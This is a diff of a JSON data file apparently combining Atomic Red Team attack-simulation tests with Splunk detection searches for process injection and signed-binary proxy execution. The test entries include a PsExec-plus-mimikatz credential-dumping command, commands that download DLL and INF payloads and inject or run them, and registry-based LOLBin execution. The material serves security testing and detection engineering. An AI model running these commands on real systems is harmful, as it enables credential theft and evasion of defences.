"powershell/code_execution/invoke_dllinjection", "powershell/code_execution/invoke_reflectivepeinjection", "powershell/code_execution/invoke_shellcode", @@ -264443,9 +267174,9 @@ "get_prereq_command": "Write-Host \"You will need to install Microsoft Word (64-bit) manually to meet this requirement\"\n" }, { - "description": "#{txt_path} must exist on disk at specified location\n", - "prereq_command": "if (Test-Path #{txt_path}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{txt_path}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055-macrocode.txt\" -OutFile \"#{txt_path}\" -UseBasicParsing\n" + "description": "\"#{txt_path}\" must exist on disk at specified location\n", + "prereq_command": "if (Test-Path \"#{txt_path}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{txt_path}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055-macrocode.txt\" -OutFile \"#{txt_path}\" -UseBasicParsing\n" } ], "executor": { @@ -264487,11 +267218,11 @@ { "description": "PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path})\n", "prereq_command": "if (Test-Path \"#{psexec_path}\") { exit 0} else { exit 1}\n", - "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nNew-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://download.sysinternals.com/files/PSTools.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools.zip\" -UseBasicParsing\nExpand-Archive PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools.zip PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools -Force\nNew-Item -ItemType Directory (Split-Path \"#{psexec_path}\") -Force | Out-Null\nCopy-Item PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools\\PsExec.exe \"#{psexec_path}\" -Force\n" + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nNew-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://download.sysinternals.com/files/PSTools.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools.zip\" -UseBasicParsing\nExpand-Archive \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools.zip\" \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools\" -Force\nNew-Item -ItemType Directory (Split-Path \"#{psexec_path}\") -Force | Out-Null\nCopy-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools\\PsExec.exe\" \"#{psexec_path}\" -Force\n" } ], "executor": { - "command": "#{psexec_path} /accepteula \\\\#{machine} -c #{mimikatz_path} \"lsadump::lsa /inject /id:500\" \"exit\"\n", + "command": "\"#{psexec_path}\" /accepteula \\\\#{machine} -c #{mimikatz_path} \"lsadump::lsa /inject /id:500\" \"exit\"\n", "name": "command_prompt", "elevation_required": false } @@ -264504,10 +267235,31 @@ "windows" ], "executor": { - "command": "$notepad = Start-Process notepad -passthru\nStart-Process $PathToAtomicsFolder\\T1055\\bin\\x64\\InjectView.exe\n", + "command": "$notepad = Start-Process notepad -passthru\nStart-Process \"$PathToAtomicsFolder\\T1055\\bin\\x64\\InjectView.exe\"\n", "cleanup_command": "Stop-Process $notepad.pid", "name": "powershell" } + }, + { + "name": "Dirty Vanity process Injection", + "auto_generated_guid": "49543237-25db-497b-90df-d0a0a6e8fe2c", + "description": "This test used the Windows undocumented remote-fork API RtlCreateProcessReflection to create a cloned process of the parent process\nwith shellcode written in its memory. The shellcode is executed after being forked to the child process. The technique was first presented at \nBlackHat Europe 2022. Shellcode will open a messsage box and a notepad.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "pid": { + "description": "Parent process ID", + "type": "string", + "default": "(Start-Process calc.exe -PassThru).Id" + } + }, + "executor": { + "command": "Start-Process \"$PathToAtomicsFolder\\T1055\\bin\\x64\\redVanity.exe\" #{pid}\n", + "cleanup_command": "Get-Process -Name calc, CalculatorApp -ErrorAction SilentlyContinue | Stop-Process -Force", + "name": "powershell", + "elevation_required": false + } } ] } @@ -265183,7 +267935,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "An instance of $process_name$ was identified on endpoint $Computer$ by user $user$ accessing known suspicious named pipes related to Cobalt Strike.", + "message": "An instance of $process_name$ was identified on endpoint $dest$ accessing known suspicious named pipes related to Cobalt Strike.", "mitre_attack_id": [ "T1055" ], @@ -265192,14 +267944,7 @@ ], "observable": [ { - "name": "user", - "type": "User", - "role": [ - "Victim" - ] - }, - { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" @@ -265209,7 +267954,7 @@ "name": "process_name", "type": "Process", "role": [ - "Parent Process" + "Child Process" ] } ], @@ -265246,7 +267991,8 @@ "name": "Create Remote Thread In Shell Application", "analytic_story": [ "IcedID", - "Qakbot" + "Qakbot", + "Warzone RAT" ], "asset_type": "Endpoint", "cis20": [ @@ -265386,7 +268132,7 @@ { "name": "GPUpdate with no Command Line Arguments with Network", "description": "The following analytic identifies gpupdate.exe with no command line arguments and with a network connection. It is unusual for gpupdate.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, triage any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. gpupdate.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=gpupdate.exe by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process=\"(?i)(gpupdate\\.exe.{0,4}$)\"| join process_id [| tstats `security_content_summariesonly` count FROM datamodel=Network_Traffic.All_Traffic where All_Traffic.dest_port != 0 by All_Traffic.process_id All_Traffic.dest All_Traffic.dest_port | `drop_dm_object_name(All_Traffic)` | rename dest as C2 ] | table _time dest parent_process_name process_name process_path process process_id dest_port C2 | `gpupdate_with_no_command_line_arguments_with_network_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=gpupdate.exe by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.user Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process=\"(?i)(gpupdate\\.exe.{0,4}$)\"| join process_id [| tstats `security_content_summariesonly` count FROM datamodel=Network_Traffic.All_Traffic where All_Traffic.dest_port != 0 by All_Traffic.process_id All_Traffic.dest All_Traffic.dest_port | `drop_dm_object_name(All_Traffic)` | rename dest as C2 ] | table _time user dest parent_process_name process_name process_path process process_id dest_port C2 | `gpupdate_with_no_command_line_arguments_with_network_filter`", "tags": { "name": "GPUpdate with no Command Line Arguments with Network", "analytic_story": [ @@ -265401,7 +268147,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "Process gpupdate.exe with parent_process $parent_process_name$ is executed on $dest$ by user $user$, followed by an outbound network connection to $connection_to_CNC$ on port $dest_port$. This behaviour is seen with cobaltstrike.", + "message": "Process gpupdate.exe with parent_process $parent_process_name$ is executed on $dest$ by user $user$, followed by an outbound network connection to $C2$ on port $dest_port$. This behaviour is seen with cobaltstrike.", "mitre_attack_id": [ "T1055" ], @@ -265432,10 +268178,10 @@ ] }, { - "name": "connection_to_CNC", + "name": "C2", "type": "IP Address", "role": [ - "Other" + "Attacker" ] } ], @@ -266032,7 +268778,7 @@ { "name": "Suspicious DLLHost no Command Line Arguments", "description": "The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where `process_dllhost` by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process=\"(?i)(dllhost\\.exe.{0,4}$)\" | `suspicious_dllhost_no_command_line_arguments_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where `process_dllhost` by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.user Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process=\"(?i)(dllhost\\.exe.{0,4}$)\" | `suspicious_dllhost_no_command_line_arguments_filter`", "tags": { "name": "Suspicious DLLHost no Command Line Arguments", "analytic_story": [ @@ -266063,7 +268809,7 @@ ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" @@ -266098,7 +268844,7 @@ { "name": "Suspicious GPUpdate no Command Line Arguments", "description": "The following analytic identifies gpupdate.exe with no command line arguments. It is unusual for gpupdate.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. gpupdate.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where `process_gpupdate` by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process=\"(?i)(gpupdate\\.exe.{0,4}$)\" | `suspicious_gpupdate_no_command_line_arguments_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where `process_gpupdate` by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.user Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process=\"(?i)(gpupdate\\.exe.{0,4}$)\" | `suspicious_gpupdate_no_command_line_arguments_filter`", "tags": { "name": "Suspicious GPUpdate no Command Line Arguments", "analytic_story": [ @@ -266129,7 +268875,7 @@ ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" @@ -266164,7 +268910,7 @@ { "name": "Suspicious SearchProtocolHost no Command Line Arguments", "description": "The following analytic identifies searchprotocolhost.exe with no command line arguments. It is unusual for searchprotocolhost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. searchprotocolhost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=searchprotocolhost.exe by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process=\"(?i)(searchprotocolhost\\.exe.{0,4}$)\" | `suspicious_searchprotocolhost_no_command_line_arguments_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=searchprotocolhost.exe by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.user Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process=\"(?i)(searchprotocolhost\\.exe.{0,4}$)\" | `suspicious_searchprotocolhost_no_command_line_arguments_filter`", "tags": { "name": "Suspicious SearchProtocolHost no Command Line Arguments", "analytic_story": [ @@ -266195,7 +268941,7 @@ ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" @@ -266373,13 +269119,6 @@ "DE.AE" ], "observable": [ - { - "name": "user", - "type": "User", - "role": [ - "Victim" - ] - }, { "name": "dest", "type": "Hostname", @@ -266523,7 +269262,8 @@ "name": "Windows Process Injection Remote Thread", "analytic_story": [ "Qakbot", - "Graceful Wipe Out Attack" + "Graceful Wipe Out Attack", + "Warzone RAT" ], "asset_type": "80", "cis20": [ @@ -266607,7 +269347,8 @@ "tags": { "name": "Windows Process Injection Wermgr Child Process", "analytic_story": [ - "Qakbot" + "Qakbot", + "Windows Error Reporting Service Elevation of Privilege Vulnerability" ], "asset_type": "Endpoint", "cis20": [ @@ -269697,18 +272438,20 @@ } ], "command_list": [ - "mavinject.exe 1000 /INJECTRUNNING \\T1218\\src\\x64\\T1218.dll\n", - "C:\\Windows\\SysWow64\\Register-CimProvider.exe -Path \\T1218\\src\\Win32\\T1218-2.dll\n", - "InfDefaultInstall.exe \\T1218\\src\\Infdefaultinstall.inf\n", + "mavinject.exe 1000 /INJECTRUNNING \"\\T1218\\src\\x64\\T1218.dll\"\n", + "C:\\Windows\\SysWow64\\Register-CimProvider.exe -Path \"\\T1218\\src\\Win32\\T1218-2.dll\"\n", + "InfDefaultInstall.exe \"\\T1218\\src\\Infdefaultinstall.inf\"\n", "FOR /F \"tokens=2*\" %a in ('reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\Winword.exe\" /V PATH') do set microsoft_wordpath=%b\ncall \"%microsoft_wordpath%\\protocolhandler.exe\" \"ms-word:nft|u|https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx\"\n", "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\microsoft.workflow.compiler.exe \"\\T1218\\src\\T1218.xml\" output.txt\n", - "\\..\\ExternalPayloads\\svchost.exe \\T1218\\src\\T1218.xml output.txt\n", + "&\"\\..\\ExternalPayloads\\svchost.exe\" \"\\T1218\\src\\T1218.xml\" output.txt\n", "Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName foo -ModulePath $PWD", "C:\\Windows\\System32\\diskshadow.exe -S \\T1218\\src\\T1218.txt \n", - "wuauclt.exe /UpdateDeploymentProvider \\T1218\\bin\\calc.dll /RunHandlerComServer\n", + "wuauclt.exe /UpdateDeploymentProvider \"\\T1218\\bin\\calc.dll\" /RunHandlerComServer\n", "Gpscript /logon\n", "Gpscript /startup\n", - "copy c:\\windows\\system32\\ie4uinit.exe %TEMP%\\ie4uinit.exe\ncopy \\T1218\\src\\ieuinit.inf %TEMP%\\ieuinit.inf\n%TEMP%\\ie4uinit.exe -BaseSettings\n", + "copy c:\\windows\\system32\\ie4uinit.exe %TEMP%\\ie4uinit.exe\ncopy \"\\T1218\\src\\ieuinit.inf\" %TEMP%\\ieuinit.inf\n%TEMP%\\ie4uinit.exe -BaseSettings\n", + "if (-not (Test-Path C:\\test)) {\nNew-Item -Path C:\\test -ItemType Directory\n} else {\nWrite-Host \"Directory C:\\test already exists.\" }\nCopy-Item -Path \"C:\\windows\\system32\\customshellhost.exe\" -Destination \"C:\\test\\customshellhost.exe\" -Force\nCopy-Item -Path \"C:\\windows\\system32\\calc.exe\" -Destination \"C:\\test\\explorer.exe\" -Force\nC:\\test\\customshellhost.exe\n", + "reg.exe add HKLM\\SOFTWARE\\Microsoft\\Provisioning\\Commands\\LOLBin\\dummy1 /v altitude /t REG_DWORD /d 0\nreg add HKLM\\SOFTWARE\\Microsoft\\Provisioning\\Commands\\LOLBin\\dummy1\\dummy2 /v Commandline /d calc.exe\nc:\\windows\\system32\\provlaunch.exe LOLBin\n", "mavinject.exe|SyncAppvPublishingServer.exe" ], "commands": [], @@ -270086,12 +272829,12 @@ "dependencies": [ { "description": "T1218.dll must exist on disk at specified location (#{dll_payload})\n", - "prereq_command": "if (Test-Path #{dll_payload}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll\" -OutFile \"#{dll_payload}\"\n" + "prereq_command": "if (Test-Path \"#{dll_payload}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{dll_payload}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll\" -OutFile \"#{dll_payload}\"\n" } ], "executor": { - "command": "mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}\n", + "command": "mavinject.exe #{process_id} /INJECTRUNNING \"#{dll_payload}\"\n", "name": "command_prompt", "elevation_required": true } @@ -270114,12 +272857,12 @@ "dependencies": [ { "description": "T1218-2.dll must exist on disk at specified location (#{dll_payload})\n", - "prereq_command": "if (Test-Path #{dll_payload}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll\" -OutFile \"#{dll_payload}\"\n" + "prereq_command": "if (Test-Path \"#{dll_payload}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{dll_payload}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll\" -OutFile \"#{dll_payload}\"\n" } ], "executor": { - "command": "C:\\Windows\\SysWow64\\Register-CimProvider.exe -Path #{dll_payload}\n", + "command": "C:\\Windows\\SysWow64\\Register-CimProvider.exe -Path \"#{dll_payload}\"\n", "name": "command_prompt" } }, @@ -270141,12 +272884,12 @@ "dependencies": [ { "description": "INF file must exist on disk at specified location (#{inf_to_execute})\n", - "prereq_command": "if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf\" -OutFile \"#{inf_to_execute}\"\n" + "prereq_command": "if (Test-Path \"#{inf_to_execute}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{inf_to_execute}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf\" -OutFile \"#{inf_to_execute}\"\n" } ], "executor": { - "command": "InfDefaultInstall.exe #{inf_to_execute}\n", + "command": "InfDefaultInstall.exe \"#{inf_to_execute}\"\n", "name": "command_prompt" } }, @@ -270254,7 +272997,7 @@ } ], "executor": { - "command": "#{renamed_binary} #{xml_payload} output.txt\n", + "command": "&\"#{renamed_binary}\" \"#{xml_payload}\" output.txt\n", "name": "powershell", "elevation_required": false } @@ -270313,8 +273056,8 @@ "dependencies": [ { "description": "txt file must exist on disk at specified location (#{txt_payload})", - "prereq_command": "if (Test-Path #{txt_payload}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{txt_payload}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/T1218.txt\" -OutFile \"#{txt_payload}\"\n" + "prereq_command": "if (Test-Path \"#{txt_payload}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{txt_payload}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/T1218.txt\" -OutFile \"#{txt_payload}\"\n" }, { "description": "DiskShadow.exe must exist on disk at specified location (#{dspath})", @@ -270347,11 +273090,11 @@ { "description": "DLL to load must exist on disk as specified location (#{arbitrary_dll})\n", "prereq_command": "if (test-path \"#{arbitrary_dll}\"){exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{arbitrary_dll}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/bin/calc.dll?raw=true\" -OutFile \"#{arbitrary_dll}\"\n" + "get_prereq_command": "New-Item -Type Directory (split-path \"#{arbitrary_dll}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/bin/calc.dll?raw=true\" -OutFile \"#{arbitrary_dll}\"\n" } ], "executor": { - "command": "wuauclt.exe /UpdateDeploymentProvider #{arbitrary_dll} /RunHandlerComServer\n", + "command": "wuauclt.exe /UpdateDeploymentProvider \"#{arbitrary_dll}\" /RunHandlerComServer\n", "cleanup_command": "taskkill /f /im calculator.exe > nul 2>&1", "name": "command_prompt" } @@ -270400,10 +273143,43 @@ } }, "executor": { - "command": "copy #{Path_ie4uinit} %TEMP%\\ie4uinit.exe\ncopy #{Path_inf} %TEMP%\\ieuinit.inf\n%TEMP%\\ie4uinit.exe -BaseSettings\n", + "command": "copy #{Path_ie4uinit} %TEMP%\\ie4uinit.exe\ncopy \"#{Path_inf}\" %TEMP%\\ieuinit.inf\n%TEMP%\\ie4uinit.exe -BaseSettings\n", "cleanup_command": "del %TEMP%\\ie4uinit.exe >nul 2>&1\ndel %TEMP%\\ieuinit.inf >nul 2>&1\n", "name": "command_prompt" } + }, + { + "name": "LOLBAS CustomShellHost to Spawn Process", + "auto_generated_guid": "b1eeb683-90bb-4365-bbc2-2689015782fe", + "description": "This test simulates an adversary copying `customshellhost.exe` and `calc.exe` from `C:\\windows\\system32\\` to `C:\\temp\\`, renaming `calc.exe` to `explorer.exe`.\nUpon execution, customshellhost.exe will spawn calc.exe.\nNote this will only work on Windows 10 or 11.\n[LOLBAS](https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/)\n[BishopFox](https://bishopfox.com/blog/edr-bypass-with-lolbins)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "dest_path": { + "description": "Directory to copy files into", + "type": "path", + "default": "C:\\test" + } + }, + "executor": { + "command": "if (-not (Test-Path #{dest_path})) {\nNew-Item -Path #{dest_path} -ItemType Directory\n} else {\nWrite-Host \"Directory #{dest_path} already exists.\" }\nCopy-Item -Path \"C:\\windows\\system32\\customshellhost.exe\" -Destination \"#{dest_path}\\customshellhost.exe\" -Force\nCopy-Item -Path \"C:\\windows\\system32\\calc.exe\" -Destination \"#{dest_path}\\explorer.exe\" -Force\n#{dest_path}\\customshellhost.exe\n", + "cleanup_command": "Remove-Item -Path #{dest_path} -Recurse -Force\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Provlaunch.exe Executes Arbitrary Command via Registry Key", + "auto_generated_guid": "ab76e34f-28bf-441f-a39c-8db4835b89cc", + "description": "Provlaunch.exe executes a command defined in the Registry. This test will create the necessary registry keys and values, then run provlaunch.exe to execute an arbitrary command.\n- https://twitter.com/0gtweet/status/1674399582162153472\n- https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/\nRegistry keys are deleted after successful execution.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "reg.exe add HKLM\\SOFTWARE\\Microsoft\\Provisioning\\Commands\\LOLBin\\dummy1 /v altitude /t REG_DWORD /d 0\nreg add HKLM\\SOFTWARE\\Microsoft\\Provisioning\\Commands\\LOLBin\\dummy1\\dummy2 /v Commandline /d calc.exe\nc:\\windows\\system32\\provlaunch.exe LOLBin\n", + "name": "command_prompt" + } } ] } @@ -272426,7 +275202,7 @@ { "name": "CMLUA Or CMSTPLUA UAC Bypass", "description": "This analytic detects a potential process using COM Object like CMLUA or CMSTPLUA to bypass UAC. This technique has been used by ransomware adversaries to gain administrative privileges to its running process.", - "search": "`sysmon` EventCode=7 ImageLoaded IN (\"*\\\\CMLUA.dll\", \"*\\\\CMSTPLUA.dll\", \"*\\\\CMLUAUTIL.dll\") NOT(process_name IN(\"CMSTP.exe\", \"CMMGR32.exe\")) NOT(Image IN(\"*\\\\windows\\\\*\", \"*\\\\program files*\")) | stats count min(_time) as firstTime max(_time) as lastTime by Image ImageLoaded process_name Computer EventCode Signed ProcessId | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `cmlua_or_cmstplua_uac_bypass_filter`", + "search": "`sysmon` EventCode=7 ImageLoaded IN (\"*\\\\CMLUA.dll\", \"*\\\\CMSTPLUA.dll\", \"*\\\\CMLUAUTIL.dll\") NOT(process_name IN(\"CMSTP.exe\", \"CMMGR32.exe\")) NOT(Image IN(\"*\\\\windows\\\\*\", \"*\\\\program files*\")) | stats count min(_time) as firstTime max(_time) as lastTime by dest Image ImageLoaded process_name Computer EventCode Signed ProcessId | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `cmlua_or_cmstplua_uac_bypass_filter`", "tags": { "name": "CMLUA Or CMSTPLUA UAC Bypass", "analytic_story": [ @@ -272441,7 +275217,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "The following module $ImageLoaded$ was loaded by a non-standard application on endpoint $Computer$ by user $user$.", + "message": "The following module $ImageLoaded$ was loaded by a non-standard application on endpoint $dest$", "mitre_attack_id": [ "T1218", "T1218.003" @@ -272451,25 +275227,11 @@ ], "observable": [ { - "name": "user", - "type": "User", - "role": [ - "Victim" - ] - }, - { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" ] - }, - { - "name": "ImageLoaded", - "type": "Other", - "role": [ - "Other" - ] } ], "risk_score": 80, @@ -272758,7 +275520,7 @@ { "name": "Detect HTML Help URL in Command Line", "description": "The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) file from a remote url. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review reputation of remote IP and domain. Some instances, it is worth decompiling the .chm file to review its original contents. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_hh` Processes.process=*http* by Processes.dest Processes.user Processes.parent_process Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_html_help_url_in_command_line_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_hh` Processes.process=*http* by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_html_help_url_in_command_line_filter`", "tags": { "name": "Detect HTML Help URL in Command Line", "analytic_story": [ @@ -272772,7 +275534,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "An instance of $parent_proces_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ contacting a remote destination to potentally download a malicious payload.", + "message": "An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ contacting a remote destination to potentally download a malicious payload.", "mitre_attack_id": [ "T1218", "T1218.001" @@ -272810,364 +275572,7 @@ ] } ], - "risk_score": 90, - "security_domain": "endpoint", - "risk_severity": "high", - "mitre_attack_enrichments": [ - { - "mitre_attack_id": "T1218", - "mitre_attack_technique": "System Binary Proxy Execution", - "mitre_attack_tactics": [ - "Defense Evasion" - ], - "mitre_attack_groups": [ - "Lazarus Group" - ] - }, - { - "mitre_attack_id": "T1218.001", - "mitre_attack_technique": "Compiled HTML File", - "mitre_attack_tactics": [ - "Defense Evasion" - ], - "mitre_attack_groups": [ - "APT38", - "APT41", - "Dark Caracal", - "OilRig", - "Silence" - ] - } - ] - } - }, - { - "name": "Detect HTML Help Using InfoTech Storage Handlers", - "description": "The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) file using InfoTech Storage Handlers. This particular technique will load Windows script code from a compiled help file, using InfoTech Storage Handlers. itss.dll will load upon execution. Three InfoTech Storage handlers are supported - ms-its, its, mk:@MSITStore. ITSS may be used to launch a specific html/htm file from within a CHM file. CHM files may contain nearly any file type embedded. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_hh` Processes.process IN (\"*its:*\", \"*mk:@MSITStore:*\") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_html_help_using_infotech_storage_handlers_filter`", - "tags": { - "name": "Detect HTML Help Using InfoTech Storage Handlers", - "analytic_story": [ - "Suspicious Compiled HTML Activity", - "Living Off The Land" - ], - "asset_type": "Endpoint", 